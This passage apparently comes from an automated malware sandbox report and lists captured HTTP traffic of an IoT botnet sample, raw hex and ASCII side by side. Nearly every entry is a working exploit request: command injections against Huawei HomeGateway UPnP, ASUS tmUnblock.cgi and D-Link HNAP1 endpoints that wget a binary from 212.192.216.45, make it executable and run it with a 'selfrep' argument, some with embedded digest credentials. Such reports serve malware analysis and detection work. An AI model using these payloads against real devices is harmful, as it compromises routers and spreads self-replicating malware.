68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 